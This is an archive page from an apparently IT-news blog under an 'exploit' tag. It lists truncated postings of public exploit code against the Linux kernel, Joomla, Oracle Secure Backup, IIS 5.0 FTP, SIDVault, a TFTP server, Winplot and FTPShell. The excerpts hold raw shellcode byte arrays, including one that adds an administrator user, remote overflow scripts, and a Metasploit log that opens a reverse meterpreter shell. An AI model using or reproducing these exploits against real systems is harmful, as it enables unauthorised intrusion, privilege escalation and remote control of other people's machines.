GO IT WORLD | IT TECH | IT NEWS » exploit

Linux binfmt_elf core dump buffer overflow

jason — Mon, 19 Sep 2011 13:45:40 +0000

/*
* Linux binfmt_elf core dump buffer overflow
*
* Copyright (c) 2005 iSEC Security Research. All Rights Reserved.
*
* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
*
*/
// phase 1
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>

#include <sys/time.h>
#include <sys/resource.h>

#include <asm/page.h>

static char *env[10], *argv[4];
static char page[PAGE_SIZE];
static char… Read the rest

Buffer Overflows exploit

jason — Mon, 06 Dec 2010 07:04:37 +0000

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow.

C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer… Read the rest

Joomla com_mytube (user_id) Blind SQL Injection Exploit

jason — Thu, 15 Oct 2009 12:19:29 +0000

#!/usr/bin/perl -w

#———————————————————————————
#joomla component com_mytube (user_id) Blind SQL Injection Vulnerability
#———————————————————————————

#Author         : Chip D3 Bi0s
#Group          : LatiHackTeam
#Email          : chipdebios[alt+64]gmail.com
#Date           : 15 September 2009
#Critical Lvl   : Moderate
#Impact            : Exposure of sensitive information
#Where            : From Remote
#—————————————————————————

#Affected software description:
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#Application   : MyRemote Video Gallery
#version       : 1.0 Beta
#Developer     : Jomtube Team
#License       : GPL            type : Non-Commercial
#Date Added    : Aug 24, 2009
#Download      : http://joomlacode.org/gf/download/frsrelease/10834/42943/com_mytube_1.0.0_2009.08.02.zip
#Description   :

#MyRemote… Read the rest

Oracle Secure Backup Server 10.3.0.1.0 Auth Bypass/RCI Exploit

jason — Tue, 06 Oct 2009 12:52:58 +0000

#!/bin/bash

#Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
#1-day exploit for CVE-2009-1977 and CVE-2009-1978

#PoC script successfully tested on:
#Oracle Secure Backup Server 10.3.0.1.0_win32_release
#MS Windows Professional XP SP3

#In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.
#Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart
#authentication bypass and a trivial command injection, resulting in arbitrary command execution.

#References:
#http://www.zerodayinitiative.com/advisories/ZDI-09-058/
#http://www.zerodayinitiative.com/advisories/ZDI-09-059/… Read the rest

Winplot (.wp2 File) Local Buffer Overflow Exploit

jason — Fri, 25 Sep 2009 12:43:13 +0000

# Author: Rick
# Email: rick2600@hotmail.com
#
# Software: http://math.exeter.edu/rparris/peanut/wp32z.exe
# Version: Compiled in 19 sept 2009
#
# Exec: calc.exe
# Tested on: Windows XP SP2 EN,PT-BR, Vista
# Greeting: Hisok4, All my friends

$header1 =
"\x49\x03\x00\x00\x19\x00\x00\x00\x30\x00\x00\x00\x2e\x00\x00\x00".
"\x0e\x02\x00\x00\x0e\x02\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00".
"\x3d\x00\x00\x00\xd9\xff\xff\xff\x2c\x01\x00\x00\x64\x00\x00\x00".
"\x64\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00".
"\x0f\x00\x00\x00\x2b\xd0\x28\x01\x49\x1e\x29\x01\x00\x00\x00\x00".
"\x0c\x00\x00\x00\x0a\x00\x00\x00\x0a\x00\x00\x00\x08\x00\x00\x00".
"\x0c\x00\x00\x00\x0a\x00\x00\x00\x0a\x00\x00\x00\x0a\x00\x00\x00".
"\x0a\x00\x00\x00\x0a\x00\x00\x00\xf0\xff\xff\xff\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00".
"\x08\x02\x01\x31\x43\x6f\x75\x72\x69\x65\x72\x20\x4e\x65\x77\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\xf3\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00\x02\x08\x02\x01\x31".
"\x53\x79\x6d\x62\x6f\x6c\x00\x20\x4e\x65\x77\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\xf3\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x90\x01\x00\x00\x00\x00\x00\x00\x08\x02\x01\x31\x43\x6f\x75\x72".
"\x69\x65\x72\x20\x4e\x65\x77\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf5\xff\xff\xff".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00".
"\x00\x00\x00\x00\x08\x02\x01\x31\x43\x6f\x75\x72\x69\x65\x72\x20".
"\x4e\x65\x77\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\xf0\xff\xff\xff\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x90\x01\x00\x00\x00\x00\x00\x00".
"\x08\x02\x01\x02\x54\x69\x6d\x65\x73\x00\x72\x20\x4e\x65\x77\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00". Read the rest

Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)

jason — Tue, 08 Sep 2009 01:25:29 +0000

# IIS 5.0 FTPd / Remote r00t exploit
# Win2k SP4 targets
# bug found & exploited by Kingcope, kcope2<at>googlemail.com
# Affects IIS6 with stack cookie protection
# August 2009 – KEEP THIS 0DAY PRIV8
use IO::Socket;
$|=1;
#metasploit shellcode, adduser "winown:nwoniw"
$sc = "\x89\xe2\xda\xde\xd9\x72\xf4\x5b\x53\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x4a\x48\x50\x44\x43\x30\x43\x30" .
"\x43\x30\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55" .
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b" .
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" .
"\x4c\x4b\x43\x31\x4a\x4e\x50\x31\x49\x50\x4c\x59\x4e\x4c" .
"\x4c\x44\x49\x50\x44\x34\x43\x37\x49\x51\x49\x5a\x44\x4d" .
"\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x51\x44\x46\x44" .
"\x43\x34\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31" .
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" .
"\x45\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51" .
"\x4a\x4b\x4b\x39\x51\x4c\x46\x44\x44\x44\x48\x43\x51\x4f" .
"\x46\x51\x4c\x36\x43\x50\x50\x56\x45\x34\x4c\x4b\x50\x46" . Read the rest

SIDVault 2.0e Windows Remote Buffer Overflow Exploit (meta)

jason — Sun, 06 Sep 2009 00:43:26 +0000

#–attack-log–
#attacker@dz-labs:~/pentests/metasploit/framework-3.2/trunk$
./msfcli exploit/windows/ldap/sidvault_ldap #PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.2 RHOST=192.168.1.3 E
#[*] Please wait while we load the module tree…
#[*] Handler binding to LHOST 0.0.0.0
#[*] Started reverse handler
#[*] Sending stage (718336 bytes)
#[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.3:1076)

#meterpreter >

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require ‘msf/core’… Read the rest

ProSysInfo TFTP Server TFTPDWIN 0.4.2 Remote BOF Exploit

jason — Sun, 23 Aug 2009 10:37:22 +0000

#!/usr/bin/python

#ProSysInfo TFTP Server TFTPDWIN 0.4.2
#Coded by Wraith

import os
import sys
import struct
import socket
import time

print "\nProSysInfo TFTP Server TFTPDWIN 0.4.2"
print "Note: This vuln is sensitive to different buffer length\n"
if len(sys.argv)!=2:
print "Usage: tftpdwin.py <ip>"
sys.exit(0)

buffer = "\x00\x01\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
buffer += "\x8b\xc3\x66\x05\x12\x01\x50\xc3" + "\x90"*57

buffer += "\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64"
buffer += "\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C"
buffer += "\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77"
buffer += "\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60"
buffer += "\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF"
buffer += "\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7"
buffer += "\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B"
buffer += "\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4"
buffer… Read the rest

Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit

jason — Sat, 15 Aug 2009 12:46:00 +0000

/* dedicated to my best friend in the whole world, Robin Price
the joke is in your hands

just too easy — some nice library functions for reuse here though

credits to julien tinnes/tavis ormandy for the bug

may want to remove the __attribute__((regparm(3))) for 2.4 kernels,
I have no time to test

spender@www:~$ cat redhat_hehe
I bet Red Hat will wish they closed the SELinux vulnerability when they
were given the opportunity to. Now all RHEL boxes will get owned by
leeches.c :p

fd7810e34e9856f77cba67f291ba115f33411ebd… Read the rest

FTPShell Client 4.1 RC2 Name Session Stack Overflow Exploit

jason — Fri, 14 Aug 2009 08:28:06 +0000

/*
* FTPShell Client, Name Session Stack Overflow Exploit
* Tested on Version 4.1 RC2 on Windows XP SP3
* Vulnerable program download page : http://www.ftpshell.com/downloadclient.htm
* Coded by zec
* Feel yourself freely to get into touch : zec@bsdmail.com
*/

package ftpbof;
import java.io.DataOutputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
/**
* @author zec
*/
public class Main {
public static void main(String[] args) throws IOException {
/* Shellcode calc.exe Read the rest